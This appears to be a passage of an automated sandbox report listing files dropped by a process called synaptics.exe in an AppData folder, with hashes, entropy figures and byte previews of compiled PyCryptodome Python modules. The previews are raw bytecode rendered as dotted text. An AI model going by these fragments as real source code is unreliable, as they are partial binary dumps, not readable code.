                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2974
                                                                                                                                                                                                            Entropy (8bit):5.42367862428394
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:gXkxRn/584h+MihHMKCNnK3FN1UfeLdyyVNRYtCmVMclu06OJGsvpuI3NvprfgD6:gXkv/YXhH1829bgkmVMeX6cp3lprfgD6
                                                                                                                                                                                                            MD5:3AEA07E37878DCE7919321E978D49B68
                                                                                                                                                                                                            SHA1:5A204648C7556E185F9BCAF8670DB4F5D3E44463
                                                                                                                                                                                                            SHA-256:152145DE5A3707C43346926BBC4E02ACE81658F46382C3E5305B7B59D04F689F
                                                                                                                                                                                                            SHA-512:715F744DE6CC1C9A73DDD977DB3E64792B6CBBB7BD87D4CB15D1153BEF21480A995F015D98A3D69D32DCEE2A6EB2D1568E5C4B343B81C850190519EF1D76743D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...st...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.d.e...Z.d.e.d...Z.G.d.d...d.e...Z.d.S.)......)...IntegerNative.....)...long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..backend..c_size_t..c_ulonglong)...getrandbitsa.....int monty_pow(uint8_t *out,. const uint8_t *base,. const uint8_t *exp,. const uint8_t *modulus,. size_t len,. uint64_t seed);..int monty_multiply(uint8_t *out,. const uint8_t *term1,. const uint8_t *term2,. const uint8_t *modulus,. size_t len);.z.Crypto.Math._modexpZ.custom)...library..apic....................@...s0...e.Z.d.Z.e.d.d.d.....Z.d.d.d...Z.e.d.d.....Z.d.S.)...IntegerCustom..bigc....................C...s8...|.d.k.r.n.|.d.k.r.t.|...}.|.......n.t.d.....t.t.|.....S.).Nr......lit
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20909
                                                                                                                                                                                                            Entropy (8bit):5.3092891497501045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gMZpQnLssSsMoE0lkqR5oMb5W1AC3ISkMleflE3j3GZmCgVHBxVRjhM:gMZWnLRFMZSkqn5s/GWTtVtR1M
                                                                                                                                                                                                            MD5:4C5D3BFC4C257A6D8B3A5BB4FE7393F1
                                                                                                                                                                                                            SHA1:5D1B4882065EDC8D3C4CB05423FF468B7F227AA3
                                                                                                                                                                                                            SHA-256:35DAB3A7CB72529F9EC433CD595706F8CBE53D9910DF80586C3664140EA63EB8
                                                                                                                                                                                                            SHA-512:1E4E28A882EB81A75A8AED955213C9E027678D09F68226006CC1521B3403F61DE383F9E1F4A43E592961443C33C7C8340A38331A1A33330E9DBC45AA39EA813A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.o.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.j.d.k.r-e.d.....e.d.e...Z.d.e.d...Z.e.e.d...r@e.d.....G.d.d...d.e...Z.e...Z.e.d...d.k.rnd.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.d...Z.e.e.j._.n.d.d.l.m.Z...d.d...Z.d.e...d.....Z G.d.d...d.e...Z!d.S.)......N)...is_native_int)...backend..load_lib..c_ulong..c_size_t..c_uint8_ptr.....)...IntegerBasea....typedef unsigned long UNIX_ULONG;. typedef struct { int a; int b; void *c; } MPZ;. typedef MPZ mpz_t[1];. typedef UNIX_ULONG mp_bitcnt_t;.. void __gmpz_init (mpz_t x);. void __gmpz_init_set (mpz_t rop, const mpz_t op);. void __gmpz_init_set_ui (mpz_t rop, UNIX_ULONG op);.. UNIX_ULONG __gmpz_get_ui (const mpz_t op);. void __gmpz_set (mpz_t rop, const mpz_t op);. void __gmpz_set_ui (mpz_t rop, UNIX_ULONG op);. void __gmpz_add (mpz_t rop, const mpz_t op1, const mpz_t op2);. void __gmpz_add_ui (mpz_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10714
                                                                                                                                                                                                            Entropy (8bit):4.875639744001051
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ffdHxwtdzk05NpqTIIsPg96w9MOpdClFUeh/z5p3SCS2gp/cj1GiXB6ITVaw3+3h:fTOdzN5NpqTIIsEVFnG7h/LSCS2i0j1o
                                                                                                                                                                                                            MD5:31133E532FE7E9CE88AEE961D99B59B2
                                                                                                                                                                                                            SHA1:96D708D68119F3629801D998B2492CD7AC5D9C09
                                                                                                                                                                                                            SHA-256:521E6004068694871D4F4565E71BD5B365FBFD2328BDB0E853D150BC6115A5EF
                                                                                                                                                                                                            SHA-512:3950B38A639A48BD364575D06E0CC1288C05E23AE36979CF27855A7D8EDFDC9939BBB62C8E963C20C892C609A2F643552F7A94BC4A95D1B215D9962BE6253B1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.-.......................@...s8...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.S.)......)...IntegerBase.....)...long_to_bytes..bytes_to_long..inverse..GCDc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.did.d...Z.e.djd.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e.Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.dkd/d0..Z.dkd1d2..Z.d3d4..Z.dkd5d6..Z.d7d8..Z.d9d:..Z d;d<..Z!d=d>..Z"d?d@..Z#dAdB..Z$dCdD..Z%dEdF..Z&dGdH..Z'dIdJ..Z(dKdL..Z)dMdN..Z*dOdP..Z+dQdR..Z,dSdT..Z-dUdV..Z.dWdX..Z/dYdZ..Z0d[d\..Z1d]d^..Z2d_d`..Z3dadb..Z4dcdd..Z5e6dedf....Z7e6dgdh....Z8d.S.)l..IntegerNativez3A class to model a natural integer (including zero)c....................C...s<...t.|.t...r.t.d.....z.|.j.|._.W.d.S...t.y.......|.|._.Y.d.S.w.).Nz-A floating point type is not a natural number)...isinstance..float..ValueError.._value..AttributeError)...self..value..r.....WC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Cryp
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                            Entropy (8bit):4.659257385920843
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/zR0llluleh/wZWe05Ot+kiE2J5dj/a6iVWrz4mLOkcTgp:y/6/qeh/wpwkn23h/a/ArMF4
                                                                                                                                                                                                            MD5:D18CBC23899203635C58215A065FDA5B
                                                                                                                                                                                                            SHA1:0A52F5DC60EDF5CEABEE6D1CDC0E21587A013230
                                                                                                                                                                                                            SHA-256:8DAA73A7521AF25608FA6CFBA8D38D0B0FD8AFDE565D66D5600D91D4E1BE5DD3
                                                                                                                                                                                                            SHA-512:BECAE1B8396166422E7BA74E439C992A71C7168BDBD1E8602C6CF9A85EDE380F2EF4419AB97332FF5D7E44D54B4E404A88CBD7B7690BB02DC2ACB1AE04C82602
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.S.).N..r....r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Math\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20374
                                                                                                                                                                                                            Entropy (8bit):5.441798189475345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ewGALFMLX4XG+dj/WacI0yhn4HytBQwOTZ8UfXpmJWa7Bbq2PfhOTIOG:edAemj/iI0yh4HytOqUfAJWmbTPA8OG
                                                                                                                                                                                                            MD5:35AA09C8085330393CE28A56B4777175
                                                                                                                                                                                                            SHA1:A4F2E4D32CDCAC77D7EDF4D6792507DAD99E2DB3
                                                                                                                                                                                                            SHA-256:5C2269C32F664156E364294373725138DA819DC7BCC810EE435966A6AFE088F7
                                                                                                                                                                                                            SHA-512:30E79CC0A7D19F88AE962D0D7D1F8A1250E39EA10D75A55E083D12AE57570F80BB3555D1742F58281A3A4A94A07BE60EAD8F993A887D1437EA5163B2701A6157
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gPY.......................@...s$...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z e.d.d...Z!d'd.d...Z"d(d.d...Z#G.d.d...d.e$..Z%d)d.d...Z&d*d.d...Z'd.d...Z(d.d...Z)d.d...Z*d+d d!..Z+d"d#..Z,d,d%d&..Z-d.S.)-.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Crypto.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Crypto.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *data_out,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):218
                                                                                                                                                                                                            Entropy (8bit):5.0786290072264055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/S7pQylud+Z/dZ6+4L5jDwkn23h/a/ArM7BL9+:Cu62uAZ//6+4LZsfsn19+
                                                                                                                                                                                                            MD5:D5370757893EBB0EFBDF370436EB28D3
                                                                                                                                                                                                            SHA1:76B285B52FB4CBDB06C913E84679D7FBBE1D1D0E
                                                                                                                                                                                                            SHA-256:6D1F61AA3223706BCCF8F1CF96B9FD670F86D49BC0D2DF586DAD42600271AB40
                                                                                                                                                                                                            SHA-512:66704690C78895B7D1D13186C46A5D589D91C45739F23834A16435E91E0C04296EA3709AADA281E1D843FD0296A867F1DA83B2FF85FE377E2F67F01BC7DE19D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g1........................@...s....g.d...Z.d.S.).).Z.KDFZ.SecretSharingZ.DHN)...__all__..r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Protocol\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23869
                                                                                                                                                                                                            Entropy (8bit):5.54892633756803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kh5ntjDIVVMEPHq5bKA24sW4gEBNZ8CVgwpPjdbRFpCBDCO7G2xel:4t4MES5R2V+Ed3/pPteCO7h4
                                                                                                                                                                                                            MD5:472045C2ACC5C5EA897F5D7E5D3715E5
                                                                                                                                                                                                            SHA1:BF616E581FAD3E0398D74A30DDAD4CF71149B396
                                                                                                                                                                                                            SHA-256:50F6042A7376EFB6FC294BA0170083646B505818BD69D0BF16C3D49401552206
                                                                                                                                                                                                            SHA-512:87DE1EFD451F0B311C598ACA08A2594CAAF0D6619693FE9ACA9E4F4B3FE5C4933BA0B276D0E0E4023AC57181EC5B04B6F0263E6DB44CB1489495CE6BC3A7A010
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.|.......................@...s....g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d#d.d...Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"d%d d!..Z#e#Z$d"Z%d.S.)&)...generate..construct..import_key..RsaKey..oid.....N)...Random)...tobytes..bord..tostr)...DerSequence..DerNull)...bytes_to_long)...Integer)...test_probable_prime..generate_probable_prime..COMPOSITE)..._expand_subject_public_key_info.._create_subject_public_key_info. _extract_subject_public_key_infoc....................@...sV...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z..6.5dKd7d8..Z.d9d:..Z.d;d<..Z d=d>..Z!d?d@..Z"dAdB..Z#dCdD..Z$dEdF..Z%dGdH..Z&dIdJ..Z'd5S.)Lr....a....Class defining an
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1722
                                                                                                                                                                                                            Entropy (8bit):5.400027951155678
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:wSTw1WWXezNJeV8Kcsso0Gar/xCVf9SVY:Tsk4UrebbsoiSx
                                                                                                                                                                                                            MD5:39E073AEEE6CF7B9257311BA254DA052
                                                                                                                                                                                                            SHA1:8DDEE53F302EA7A33495AE0805DCE3ADC5F29CF9
                                                                                                                                                                                                            SHA-256:BF8A3A4D7A9026CC6AA58777D34AC9DEBA971194D4A63EC4699E811A8042CD80
                                                                                                                                                                                                            SHA-512:E5E81319FC7E994963BCCD491A3EB75686D611DB79CB7E15830E01F78E8A268322BEBDC26AB9E7CD9546C5CC2242B4EEAF0415158D31157AA1A500B3197FC6A1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s8...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.d...Z.d.d...Z.d.S.)......)...DerSequence..DerInteger..DerBitString..DerObjectId..DerNullc....................C...s....t...j.|.d.d...}.t...j.|.d...d.d...}.t.....|.d.....}.t.....|.d.....j.}.t.|...d.k.r,d.}.n.z.t.....|.d.......d.}.W.n.......|.d...}.Y.|.j.|.|.f.S.).z.Parse a SubjectPublicKeyInfo structure... It returns a triple with:. * OID (string). * encoded public key (bytes). * Algorithm parameters (bytes or None). .......Z.nr_elementsr....)......r....r....N).r......decoder....r......value..lenr....)...encoded..spkiZ.algo..algo_oidZ.spkZ.algo_params..r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\PublicKey\__init__.py.._expand_subject_public_key_info....s............................r....c....................C...s@...|.d.u.r.t.t.|...g...}.n.t.t.|...|.g...}.t.|.t.|...g...}.|.....S.).N).r....r....r......encode).r....Z.public_key..params..algorithmr....r..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1270
                                                                                                                                                                                                            Entropy (8bit):4.675463227543499
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:AFtWRuX2i3FOd3kr5fKInkOCUqxUNRQj/jfhlHJ4fEByWkJwjGP4gE/:dRHd0VKUEU9iDrtP6Af
                                                                                                                                                                                                            MD5:8D4895A7BD57B9077C786C069C386EB2
                                                                                                                                                                                                            SHA1:5CC9385E27F0433E66DCC8CC7D46B2EC00F83207
                                                                                                                                                                                                            SHA-256:A944D214974595AC088A827A795E15EB26B35B257B0489A35D90C8411CB28CC9
                                                                                                                                                                                                            SHA-512:E61CCCE04170333DE826427E4CD5A59C076544E96F86FA3A8D510C46BE9287BA886704715FFBCAE1A794551C87302C1243048987B8C47138E90870CD9ED287D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gJ........................@...s<...d.d.g.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc....................@...s,...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._UrandomRNGc....................C...s....t.|...S.).z0Return a random byte string of the desired size.r....)...self..n..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Random\__init__.py..read....s......z._UrandomRNG.readc....................C........d.S...z0Method provided for backward compatibility only.Nr......r....r....r....r......flush!..........z._UrandomRNG.flushc....................C...r....r....r....r....r....r....r......reinit%...r....z._UrandomRNG.reinitc....................C...r....r....r....r....r....r....r......close)...r....z._UrandomRNG.closeN)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........s..............r....c....................O...s....t...S.).zFReturn a file-like object that outputs c
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3407
                                                                                                                                                                                                            Entropy (8bit):5.312816352071411
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Mk/Yq7xkJ5PPcWgudGUJFp9YY3sjuhXNvLHf85jL:MWW5PP7gO8Y31hdvLH6
                                                                                                                                                                                                            MD5:B05886A649DD3E3ADF7EBC9ADAC8E866
                                                                                                                                                                                                            SHA1:22FA6B1CCFE81082F64F9EA11D78C21231A1171B
                                                                                                                                                                                                            SHA-256:1936A08CC7C889592D388780E882332B4CD633DBB8A0B41058849971FA8BBF2C
                                                                                                                                                                                                            SHA-512:329504BCE045663A969B1112760ACF17645D64A52CB3D783E93CDF7881AABB0CDB8583227177A8F9EB6A4603E0593733BF946E11E820765051CBD42AA7166189
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sv...g.d...Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.S.).)...StrongRandom..getrandbits..randrange..randint..choice..shuffle..sample.....)...Random)...is_native_intc....................@...sF...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...sX...|.d.u.r.|.d.u.r.d.|._.d.S.|.d.u.r.|.d.u.r.|.|._.d.S.|.d.u.r(|.d.u.r(|.j.|._.d.S.t.d.....).Nz(Cannot specify both 'rng' and 'randfunc')..._randfunc..read..ValueError)...self..rng..randfunc..r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Random\random.py..__init__ ...s..................z.StrongRandom.__init__c....................C...s:...|.j.d.u.r.t.....j.|._.d.|.>.d...}.|.t.|...t.|.d.......@.S.).z%Return an integer with k random bits.N..........).r....r......newr......bytes_to_long..ceil_div).r......k..maskr....r....r....r....*...s............z.StrongRandom.ge
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):363
                                                                                                                                                                                                            Entropy (8bit):5.3334200124860125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/u31/WlJnIsICA51dJyikQSKCUICAfeT37ZgAk+h+uwkn23h/a/ArMgA5762:Cu39WllIVF1mikQ4NSDQ+QfsnD762
                                                                                                                                                                                                            MD5:F2D6097886C081EBB51B14872E48475D
                                                                                                                                                                                                            SHA1:222DD87DCBE7B205D578DA76C587A1136C33F143
                                                                                                                                                                                                            SHA-256:AFDD8BD3E2902EA10FAB2E842B6C524D4F7580CF19EFF9D7E02DEDB9EACEE700
                                                                                                                                                                                                            SHA-512:3B89FD225CC891A35A4C43A7A1F959E9BAE5E541268BF3AB51105FDD0EEEF7C7BE569D4F551BFD9A8316A97D30CDFCB5301095EA2A5C23D3EB4143C82AFD47EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.g.d...Z.d.S.).zeDigital signature protocols..A collection of standardized protocols to carry out digital signatures..).Z.PKCS1_v1_5Z.PKCS1_PSSZ.DSSZ.pkcs1_15Z.pssZ.eddsaN)...__doc__..__all__..r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Signature\__init__.py..<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10811
                                                                                                                                                                                                            Entropy (8bit):5.326228510065543
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:A1XSDu4taLRgOBEsNXAYcURRFNlm32KFO6GaVRlpBlYa:A1CCI+RgslADURRV/KPGaVZBea
                                                                                                                                                                                                            MD5:78B74A98487D3E103B3C28B8824FCBE4
                                                                                                                                                                                                            SHA1:BC9A6275D63214D8252B98F3164547F07C67D5F4
                                                                                                                                                                                                            SHA-256:33B87D2D6F7CCD80DB5CA31700E277EE38AD835351BB7073A834C77EF0868647
                                                                                                                                                                                                            SHA-512:8C7E297047BD08CABBAA1ADC52797DEA0E0B406760844FF41465511AD89D08360A92B7F0D54031E4474EFD38EC468400EA5D29D476D1B12E5A568BDF68BA48FD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.6.......................@...sz...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...bchr..bord..iter_rangeN)...ceil_div..long_to_bytes..bytes_to_long)...strxor)...Randomc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PSS_SigSchemezvA signature object for ``RSASSA-PSS``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pss.new`.. c....................C...s....|.|._.|.|._.|.|._.|.|._.d.S.).at...Initialize this PKCS#1 PSS signature scheme object... :Parameters:. key : an RSA key object. If a private half is given, both signature and. verification are possible.. If a public half is given, only verification is possible.. mgfunc : callable. A mask generation function that accepts two parameters:. a string to use as seed, and the lenth of the mask to. genera
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2347
                                                                                                                                                                                                            Entropy (8bit):5.445720475109234
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:tbQJrnAeKJdRXlkNHKiFsx3miW7WlxeKbNRT7ytqmcQg:tbQJDAeqzlo2W6re637wg
                                                                                                                                                                                                            MD5:FEE92B9111FF738AC24640248E4A49D0
                                                                                                                                                                                                            SHA1:11CF0895F13198E5F8D7852164E09FCCD8F7B892
                                                                                                                                                                                                            SHA-256:4EB984C359859BD0A72F8425A5186158EB9CEE3C5848EC88EC1B9CB59D9D4571
                                                                                                                                                                                                            SHA-512:6354AE53E7CB9EB7A31A65D54E2098329CD7BFC14FC6EB0BFD1536594A9B68FB75FCA1308A7A0940686C8E6A867CB46752D55F8FF527BD617B3990A3C4D4CF2B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gE........................@...s(...d.d.g.Z.d.d.l.T.d.d.d...Z.d.d.d...Z.d.S.)...pad..unpad.....)...*..pkcs7c....................C...s....|.t.|...|.....}.|.d.k.r.t.|...|...}.|.|...S.|.d.k.r*t.d...|.d.....t.|.....}.|.|...S.|.d.k.r>t.d...t.d...|.d.......}.|.|...S.t.d.....).a....Apply standard padding... Args:. data_to_pad (byte string):. The data that needs to be padded.. block_size (integer):. The block boundary to use for padding. The output length is guaranteed. to be a multiple of :data:`block_size`.. style (string):. Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*... Return:. byte string : the original data with the appropriate padding added at the end.. r......x923r...........iso7816......Unknown padding style)...len..bchr..ValueError).Z.data_to_pad..block_size..style..padding_len..padding..r.....PC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\Padding.pyr....'...s....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2347
                                                                                                                                                                                                            Entropy (8bit):5.445720475109234
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:tbQJrnAeKJdRXlkNHKiFsx3miW7WlxeKbNRT7ytqmcQg:tbQJDAeqzlo2W6re637wg
                                                                                                                                                                                                            MD5:FEE92B9111FF738AC24640248E4A49D0
                                                                                                                                                                                                            SHA1:11CF0895F13198E5F8D7852164E09FCCD8F7B892
                                                                                                                                                                                                            SHA-256:4EB984C359859BD0A72F8425A5186158EB9CEE3C5848EC88EC1B9CB59D9D4571
                                                                                                                                                                                                            SHA-512:6354AE53E7CB9EB7A31A65D54E2098329CD7BFC14FC6EB0BFD1536594A9B68FB75FCA1308A7A0940686C8E6A867CB46752D55F8FF527BD617B3990A3C4D4CF2B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gE........................@...s(...d.d.g.Z.d.d.l.T.d.d.d...Z.d.d.d...Z.d.S.)...pad..unpad.....)...*..pkcs7c....................C...s....|.t.|...|.....}.|.d.k.r.t.|...|...}.|.|...S.|.d.k.r*t.d...|.d.....t.|.....}.|.|...S.|.d.k.r>t.d...t.d...|.d.......}.|.|...S.t.d.....).a....Apply standard padding... Args:. data_to_pad (byte string):. The data that needs to be padded.. block_size (integer):. The block boundary to use for padding. The output length is guaranteed. to be a multiple of :data:`block_size`.. style (string):. Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*... Return:. byte string : the original data with the appropriate padding added at the end.. r......x923r...........iso7816......Unknown padding style)...len..bchr..ValueError).Z.data_to_pad..block_size..style..padding_len..padding..r.....PC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\Padding.pyr....'...s....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1118
                                                                                                                                                                                                            Entropy (8bit):4.88832542954934
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ullUilE4ApU2gWfri+RHvEIO4oFaQvuYjVrGivBltfK2/K:uliilbASgf++BcD4YaQVprGGBXKR
                                                                                                                                                                                                            MD5:84CF8A90A7E353EC433E4B37DCDE2CB6
                                                                                                                                                                                                            SHA1:EB40A7C6CA8A8A1B9A8A25C410DB193BCDBC95CC
                                                                                                                                                                                                            SHA-256:14C37D0894F3ED986FCC605EF87BD8C9B2C8A85DBE227CAC387C3D15D6A86E2F
                                                                                                                                                                                                            SHA-512:DB0605916D2CE7F7AF7A95ED1F2AD1CAAC12CE9E4AEAD66B31967B2C0A6CF714229E7C8E341723FFD7EECDB0568593871126B354ED3C3FA0272FFE51B13850FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
